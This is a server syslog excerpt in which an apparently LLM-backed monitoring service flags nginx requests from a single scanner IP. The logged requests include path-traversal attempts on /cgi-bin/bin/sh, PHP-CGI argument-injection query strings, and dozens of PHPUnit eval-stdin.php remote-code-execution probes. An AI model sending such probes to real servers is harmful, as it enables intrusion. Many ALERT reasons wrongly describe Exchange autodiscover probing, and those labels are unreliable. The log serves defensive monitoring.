Mar 20 14:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:50:01.951032 [observer] Pipeline: processed=6499 pattern_hits=6077 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:50:01.956930 [observer] Patterns: hash=6063 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:50:31.943469 [observer] Pipeline: processed=6502 pattern_hits=6080 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:50:31.943504 [observer] Patterns: hash=6066 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:51:01.954247 [observer] Pipeline: processed=6504 pattern_hits=6082 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:51:01.954280 [observer] Patterns: hash=6068 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:51:31.936698 [observer] Pipeline: processed=6508 pattern_hits=6086 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:51:31.936724 [observer] Patterns: hash=6072 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:52:01.945561 [observer] Pipeline: processed=6510 pattern_hits=6088 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:52:01.945592 [observer] Patterns: hash=6074 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:52:31.937133 [observer] Pipeline: processed=6514 pattern_hits=6092 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:52:31.937176 [observer] Patterns: hash=6078 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:01.956895 [observer] Pipeline: processed=6516 pattern_hits=6094 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:01.956930 [observer] Patterns: hash=6080 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:53:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:10.390176 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T14:53:10.389887271Z 194.163.183.223 - - [20/Mar/2026:14:53:10 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 14:53:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:11.039736 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T14:53:11.039483120Z 194.163.183.223 - - [20/Mar/2026:14:53:11 +0000] "_" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32...
Mar 20 14:53:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:11.530783 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an nginx error about a missing file and a request containing php://input and allow_url_include indicators, which are common in attempted PHP code injection/path traversal attacks. Line=2026-03-20T14:53:11.530463223Z 2026/03/20 14:53:11 [error] 422#422: *755068 open() "/usr/share/nginx/default/hello.world" failed (2: No such file or directory), client: 194.163.183.223, server: _, req...
Mar 20 14:53:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:11.530841 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:11.530487071Z 194.163.183.223 - - [20/Mar/2026:14:53:11 +0000] "54.200.221.0" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 2401 "-"...
Mar 20 14:53:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:12.358262 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on a POST with a suspicious query attempting PHP wrappers suggests an injection/exploitation attempt targeted at PHP config. Likely malicious probe. Line=2026-03-20T14:53:12.357966863Z 194.163.183.223 - - [20/Mar/2026:14:53:12 +0000] "54.200.221.0" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 405 150 "-" "libredtail...
Mar 20 14:53:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:13.055790 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a likely PHPUnit path under nginx suggests probing for vulnerable PHP code paths. The file does not exist, but the pattern is a known reconnaissance/attack vector. Line=2026-03-20T14:53:13.055470703Z 2026/03/20 14:53:13 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), ...
Mar 20 14:53:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:13.055843 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:13.055494082Z 194.163.183.223 - - [20/Mar/2026:14:53:13 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:13.540138 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempting to access a suspicious PHP unit file path (vendor/phpunit/phpunit/Util/PHP/eval-stdin.php) on an nginx server. This mirrors common probing for phpunit vulnerabilities. Line=2026-03-20T14:53:13.539876626Z 2026/03/20 14:53:13 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), clie...
Mar 20 14:53:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:13.540244 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:13.539986208Z 194.163.183.223 - - [20/Mar/2026:14:53:13 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:14.120368 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHP Unit vendor path (eval-stdin.php) commonly used in exploit scans against phpunit; unusual path request indicating potential probe for RCE. Line=2026-03-20T14:53:14.120059581Z 2026/03/20 14:53:14 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: ...
Mar 20 14:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:14.120420 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:14.120194984Z 194.163.183.223 - - [20/Mar/2026:14:53:14 +0000] "54.200.221.0" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:14.623253 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempting to access a phpunit evaluation script (eval-stdin.php) which is a common probe for RCE/PII via PHP unit; file not found but indicative of exploitation attempt. Line=2026-03-20T14:53:14.622954389Z 2026/03/20 14:53:14 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194....
Mar 20 14:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:14.623311 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:14.623066958Z 194.163.183.223 - - [20/Mar/2026:14:53:14 +0000] "54.200.221.0" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:15.360070 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Accessing a phpunit license path under vendor suggests probing for phpunit in web root, a common web exploit pattern to locate vulnerable components. Line=2026-03-20T14:53:15.359751707Z 2026/03/20 14:53:15 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), clien...
Mar 20 14:53:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:15.360122 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:15.359792771Z 194.163.183.223 - - [20/Mar/2026:14:53:15 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:16.410951 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path which is a common probe for RCE/LFI or misconfiguration exposure Line=2026-03-20T14:53:16.410657235Z 2026/03/20 14:53:16 [error] 422#422: *755068 open() "/usr/share/nginx/default/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 14:53:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:16.411007 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:16.410717841Z 194.163.183.223 - - [20/Mar/2026:14:53:16 +0000] "54.200.221.0" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ...
Mar 20 14:53:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:17.244910 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path via HTTP request; commonly probed for known PHP unit vulnerabilities. Line=2026-03-20T14:53:17.244641714Z 2026/03/20 14:53:17 [error] 422#422: *755068 open() "/usr/share/nginx/default/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:...
Mar 20 14:53:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:17.244979 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:17.244784719Z 194.163.183.223 - - [20/Mar/2026:14:53:17 +0000] "54.200.221.0" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:17.818321 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit path suggests probing for vulnerable phpunit files; could be reconnaissance or attempted exploit Line=2026-03-20T14:53:17.818029145Z 2026/03/20 14:53:17 [error] 422#422: *755068 open() "/usr/share/nginx/default/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194...
Mar 20 14:53:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:17.818398 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:17.818205606Z 194.163.183.223 - - [20/Mar/2026:14:53:17 +0000] "54.200.221.0" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:18.393140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path that is often targeted in automated scanning; file not found but indicates probing for PHPUnit related vectors. Line=2026-03-20T14:53:18.392822033Z 2026/03/20 14:53:18 [error] 422#422: *755068 open() "/usr/share/nginx/default/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194.163...
Mar 20 14:53:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:18.393212 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:18.392889415Z 194.163.183.223 - - [20/Mar/2026:14:53:18 +0000] "54.200.221.0" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:18.824433 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request targets a known phpunit tooling path via /phpunit/Util/PHP/eval-stdin.php, which is a common probe for phpunit-related RCE exploits. Line=2026-03-20T14:53:18.824122164Z 2026/03/20 14:53:18 [error] 422#422: *755068 open() "/usr/share/nginx/default/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194.163.183...
Mar 20 14:53:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:18.824509 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:18.824214053Z 194.163.183.223 - - [20/Mar/2026:14:53:18 +0000] "54.200.221.0" "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:19.248946 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error shows an access attempt to a phpunit php file path which is a common probe for PHP code execution or vulnerability scanning. The request failed with file not found, but this pattern is unusual and warrants monitoring. Line=2026-03-20T14:53:19.248580615Z 2026/03/20 14:53:19 [error] 422#422: *755068 open() "/usr/share/nginx/default/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), cli...
Mar 20 14:53:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:19.249004 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:19.248760712Z 194.163.183.223 - - [20/Mar/2026:14:53:19 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:19.737753 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path (eval-stdin.php) typical of probe or exploit attempts against PHP frameworks. Line=2026-03-20T14:53:19.737270408Z 2026/03/20 14:53:19 [error] 422#422: *755068 open() "/usr/share/nginx/default/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:...
Mar 20 14:53:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:19.737804 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:19.737347599Z 194.163.183.223 - - [20/Mar/2026:14:53:19 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.115935 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly targeted in probes; shows potential attempt to locate vulnerable PHP tooling Line=2026-03-20T14:53:20.115644425Z 2026/03/20 14:53:20 [error] 422#422: *755068 open() "/usr/share/nginx/default/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194...
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.115990 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:20.115680074Z 194.163.183.223 - - [20/Mar/2026:14:53:20 +0000] "54.200.221.0" "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.507241 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an explicit request to a PHPunit file path (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable phpunit component. Line=2026-03-20T14:53:20.506852863Z 2026/03/20 14:53:20 [error] 422#422: *755068 open() "/usr/share/nginx/default/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 194.163...
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.507292 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:20.506929120Z 194.163.183.223 - - [20/Mar/2026:14:53:20 +0000] "54.200.221.0" "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.950174 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path (eval-stdin.php) that typically should not exist on a public web root; could indicate probing for PHP unit framework or misconfiguration. Line=2026-03-20T14:53:20.949848634Z 2026/03/20 14:53:20 [error] 422#422: *755068 open() "/usr/share/nginx/default/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:20.950229 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:20.949846766Z 194.163.183.223 - - [20/Mar/2026:14:53:20 +0000] "54.200.221.0" "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:21.423356 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:21.423025129Z 194.163.183.223 - - [20/Mar/2026:14:53:21 +0000] "54.200.221.0" "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http"...
Mar 20 14:53:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:21.423447 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log showing an access attempt to a sensitive phpunit script path (eval-stdin.php) which is a common target for PHP unit framework exploits; not confirmed malicious but warrants monitoring. Line=2026-03-20T14:53:21.423045094Z 2026/03/20 14:53:21 [error] 422#422: *755068 open() "/usr/share/nginx/default/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire...
Mar 20 14:53:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:21.791509 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit utility path under webroot is a common probe for PHP testing frameworks; indicates potential vulnerability probing or misconfiguration. Line=2026-03-20T14:53:21.791152516Z 2026/03/20 14:53:21 [error] 422#422: *755068 open() "/usr/share/nginx/default/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:21.791559 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:21.791200050Z 194.163.183.223 - - [20/Mar/2026:14:53:21 +0000] "54.200.221.0" "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:22.169629 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is a common probe for phpunit-related vulnerabilities. Line=2026-03-20T14:53:22.169134135Z 2026/03/20 14:53:22 [error] 422#422: *755068 open() "/usr/share/nginx/default/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory...
Mar 20 14:53:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:22.169683 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:22.169153325Z 194.163.183.223 - - [20/Mar/2026:14:53:22 +0000] "54.200.221.0" "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:23.022072 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a phpunit file path via nginx, which is a common probe for known vulnerabilities or misconfigurations. Line=2026-03-20T14:53:23.021801089Z 2026/03/20 14:53:23 [error] 422#422: *755068 open() "/usr/share/nginx/default/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:23.022141 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:23.021939539Z 194.163.183.223 - - [20/Mar/2026:14:53:23 +0000] "54.200.221.0" "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:23.755581 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a sensitive phpunit file suggests probing for remote code execution vulnerabilities. Line=2026-03-20T14:53:23.755243033Z 2026/03/20 14:53:23 [error] 422#422: *755068 open() "/usr/share/nginx/default/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 14:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:23.755655 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:23.755392592Z 194.163.183.223 - - [20/Mar/2026:14:53:23 +0000] "54.200.221.0" "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.235796 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path is a common probe vector for automated attacks; could indicate an attempted exploit targeting phpunit. Line=2026-03-20T14:53:24.235510795Z 2026/03/20 14:53:24 [error] 422#422: *755068 open() "/usr/share/nginx/default/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.235873 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:24.235664172Z 194.163.183.223 - - [20/Mar/2026:14:53:24 +0000] "54.200.221.0" "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.596779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access to a PHP unit testing file under V2/vendor/phpunit was attempted, which is a common probe for PHP unit exposure; module open() failure indicates missing file but the path suggests an attempted exploit vector. Line=2026-03-20T14:53:24.596494864Z 2026/03/20 14:53:24 [error] 422#422: *755068 open() "/usr/share/nginx/default/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory...
Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.596834 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:24.596595126Z 194.163.183.223 - - [20/Mar/2026:14:53:24 +0000] "54.200.221.0" "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
